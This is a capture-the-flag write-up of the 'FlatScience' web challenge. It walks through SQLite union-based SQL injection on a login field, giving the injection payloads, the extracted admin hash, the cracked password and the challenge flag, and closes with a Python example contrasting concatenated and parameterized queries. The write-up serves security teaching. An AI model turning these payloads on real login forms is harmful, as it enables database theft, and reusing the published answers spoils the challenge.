[Attack and Defense World WEB] Difficulty four-star, 12-point advanced question: FlatScience
2022-07-23 21:01:00 【Black zone (rise)】
2. FlatScience
How to solve the problem:
1. Understand the source code, database injection, encryption
The process:
I prefer to look at the robots.txt file first
/admin.php page
/login.php page
Press Ctrl+U to view the page source
Found ?debug
Found new source code
Start the code audit
The database turns out to be SQLite3 (unlike MySQL, the relevant information is stored in the sqlite_master table);
its type/name/tbl_name/rootpage/sql fields record the information from when the user created the table
The comment marker is --
The usr input is also found to be injectable
There is no filtering, so it can be spliced into the database query and executed
Intercept the request with bp (Burp Suite) and inject
(injecting in bp)
Determine the number of fields
1' order by 3 --
(An error is reported)
1' order by 2 --
(Normal echo)
So the number of fields is 2
Determine the echo position
1' union select 1,2 --
The echo position is the second one
Check the sql field in the table
CREATE+TABLE+Users%28id+int+primary+key%2Cname+varchar%28255%29%2Cpassword+varchar%28255%29%2Chint+varchar%28255%29%29
After decoding
CREATE+TABLE+Users(id+int+primary+key,name+varchar(255),password+varchar(255),hint+varchar(255))
The fields are: id, name, password, hint
Construct a query for name
payload:
1' union select id, name from Users--
admin
Construct a query for password
payload:
1' union select id, password from Users--
3fab54a50e770d830c0416df817567662a9dc85c
Construct a query for hint
payload:
1' union select id, hint from Users--
my+fav+word+in+my+fav+paper%3F%21
After decoding
my+fav+word+in+my+fav+paper?!
We get the first row of the table
id=1
name=admin
password=3fab54a50e770d830c0416df817567662a9dc85c (MD5 is message-digest encryption, so it may not be crackable)
hint=my+fav+word+in+my+fav+paper?! (it's in his paper)
Decrypted, it is
ThinJerboaSalz!
That word is Salz
ThinJerboaSalz! minus Salz
So the password is ThinJerboa
Log in on the /admin.php page
flag{Th3_Fl4t_Earth_Prof_i$_n0T_so_Smart_huh?}
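The root cause found in the code audit above is that the usr value is spliced into the SQL text without filtering. The following is an added example, not code from the challenge or the original post: it rebuilds the Users schema in an in-memory SQLite database and runs the write-up's inputs through a concatenated query and a parameterized one. The query shape, function names and row values are assumptions.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the challenge database (row values are constructed)."""
    db = sqlite3.connect(":memory:")
    # Schema as recovered from the sql field in the write-up.
    db.execute("CREATE TABLE Users(id int primary key, name varchar(255), "
               "password varchar(255), hint varchar(255))")
    db.execute("INSERT INTO Users VALUES "
               "(1, 'admin', 'HASH_PLACEHOLDER', 'HINT_PLACEHOLDER')")
    return db

def lookup_concatenated(db, usr):
    """Vulnerable: usr is spliced into the SQL text, so a quote ends the literal."""
    sql = "SELECT id, name FROM Users WHERE name='" + usr + "'"  # assumed query shape
    return db.execute(sql).fetchall()

def lookup_parameterized(db, usr):
    """Hardened: usr is bound as a value and is never parsed as SQL."""
    return db.execute("SELECT id, name FROM Users WHERE name=?", (usr,)).fetchall()

def try_lookup(lookup, db, usr):
    """Return the rows, or the SQLite error text a verbose page would echo back."""
    try:
        return lookup(db, usr)
    except sqlite3.Error as exc:
        return "error: " + str(exc)

# Inputs taken from the write-up, preceded by one ordinary username.
INPUTS = [
    "admin",
    "1' order by 3 --",
    "1' order by 2 --",
    "1' union select id, password from Users--",
]

if __name__ == "__main__":
    db = make_db()
    for usr in INPUTS:
        print(repr(usr))
        print("  concatenated :", try_lookup(lookup_concatenated, db, usr))
        print("  parameterized:", try_lookup(lookup_parameterized, db, usr))
```

With the bound parameter, every input other than the plain username matches no row and raises no error, so neither the column count nor the password column is exposed.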